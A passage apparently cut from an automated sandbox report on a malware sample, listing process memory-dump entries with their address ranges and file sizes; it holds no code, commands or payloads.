                                                                                                                                              • memory/4760-990-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-1008-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-992-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-994-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-1006-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-996-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-998-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-1004-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-1000-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4760-1002-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4764-251-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4764-252-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/4776-626-0x0000000001200000-0x0000000001293000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/4776-623-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4776-624-0x0000000001200000-0x0000000001293000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/4816-472-0x000000000041A684-mapping.dmp
                                                                                                                                              • memory/4828-683-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4840-1564-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4840-1567-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/4848-1450-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4872-1419-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4888-1056-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4896-1209-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4896-1212-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/4896-1208-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4932-659-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/4932-655-0x0000000000403BEE-mapping.dmp
                                                                                                                                              • memory/4932-654-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/4964-482-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4968-728-0x0000000007500000-0x0000000007501000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4968-697-0x0000000009780000-0x0000000009781000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4968-689-0x00000000097C0000-0x00000000097F3000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                204KB

                                                                                                                                              • memory/4968-675-0x00000000089E0000-0x00000000089E1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4968-719-0x0000000009C40000-0x0000000009C41000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4968-670-0x00000000082A0000-0x00000000082A1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4968-664-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/4968-663-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4968-698-0x00000000098F0000-0x00000000098F1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4980-158-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5000-769-0x000000000043FA56-mapping.dmp
                                                                                                                                              • memory/5000-771-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/5000-767-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/5008-1246-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5008-1255-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5036-513-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5060-1474-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5108-281-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5108-762-0x00000000090B0000-0x000000000916A000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                744KB

                                                                                                                                              • memory/5108-285-0x0000000004F70000-0x0000000004F84000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/5108-282-0x00000000083A0000-0x00000000083A1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5108-272-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5108-275-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5108-276-0x00000000000A0000-0x00000000000A1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5108-763-0x0000000009210000-0x0000000009211000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5116-1082-0x000000000043FA56-mapping.dmp
                                                                                                                                              • memory/5116-1085-0x0000000000400000-0x0000000000497000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                604KB

                                                                                                                                              • memory/5128-1480-0x0000000000403BEE-mapping.dmp
                                                                                                                                              • memory/5128-1484-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5136-1150-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/5136-1148-0x000000000041A684-mapping.dmp
                                                                                                                                              • memory/5136-1146-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/5144-1126-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5152-1054-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5164-1243-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5164-1251-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5200-720-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5212-734-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5212-718-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5260-1135-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5272-1418-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5272-1422-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5276-1563-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5276-1560-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5332-725-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5332-736-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5388-1137-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5392-1055-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5400-1215-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5404-1138-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5428-731-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5428-739-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5456-1129-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5456-1125-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5460-1087-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5480-1219-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5480-1226-0x000001C875C00000-0x000001C875C01000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5480-1228-0x000001C875C30000-0x000001C875C31000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5480-1216-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5480-1227-0x000001C878100000-0x000001C878101000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5516-1182-0x0000000000403BEE-mapping.dmp
                                                                                                                                              • memory/5516-1185-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5536-1151-0x0000000000070000-0x0000000000071000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5536-1142-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5536-1430-0x0000000007CB0000-0x0000000007D09000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                356KB

                                                                                                                                              • memory/5536-1147-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5540-1075-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5544-741-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5544-735-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5552-768-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/5552-772-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5552-1140-0x0000000007B90000-0x0000000007BD7000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                284KB

                                                                                                                                              • memory/5552-764-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5608-1079-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5656-1240-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5656-1234-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5680-1242-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5680-1237-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5708-1233-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5708-1238-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5728-1253-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5728-1261-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5768-1049-0x000000000040DDD4-mapping.dmp
                                                                                                                                              • memory/5768-1050-0x0000000000400000-0x0000000000418000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/5768-1048-0x0000000000400000-0x0000000000418000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/5772-1424-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5788-1535-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5788-1548-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5792-1181-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5792-1193-0x0000000004CE0000-0x0000000004DE1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/5864-1204-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5868-1294-0x0000019936030000-0x0000019936031000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5868-1235-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5868-1231-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5908-1241-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5908-1248-0x00007FFFD1E80000-0x00007FFFD286C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/5924-1051-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5956-1579-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5956-1589-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6012-780-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6012-753-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6056-1532-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6056-1536-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6084-1539-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6084-1556-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6212-1524-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6252-1505-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6272-1525-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6272-1523-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6280-1413-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6280-1409-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6364-1552-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6364-1559-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6420-1574-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/6420-1568-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6492-1468-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6492-1465-0x000000000040616E-mapping.dmp
                                                                                                                                              • memory/6644-1281-0x000000000040DDD4-mapping.dmp
                                                                                                                                              • memory/6692-1586-0x000000000040DDD4-mapping.dmp
                                                                                                                                              • memory/6768-1502-0x00000000041C0000-0x000000000421C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                368KB

                                                                                                                                              • memory/6768-1582-0x0000000004CF0000-0x0000000004D41000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                324KB

                                                                                                                                              • memory/6768-1405-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6848-1291-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6848-1299-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6880-1301-0x000000000043FA56-mapping.dmp
                                                                                                                                              • memory/6880-1305-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                588KB

                                                                                                                                              • memory/6884-1546-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6884-1540-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6972-1401-0x0000000072B80000-0x000000007326E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.9MB

                                                                                                                                              • memory/6972-1398-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/7024-1537-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/7024-1551-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/7072-1580-0x00007FFFCDF90000-0x00007FFFCE97C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                9.9MB

                                                                                                                                              • memory/7072-1575-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/7084-1616-0x0000000000417A8B-mapping.dmp
                                                                                                                                              • memory/7084-1618-0x0000000000400000-0x0000000000434000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                208KB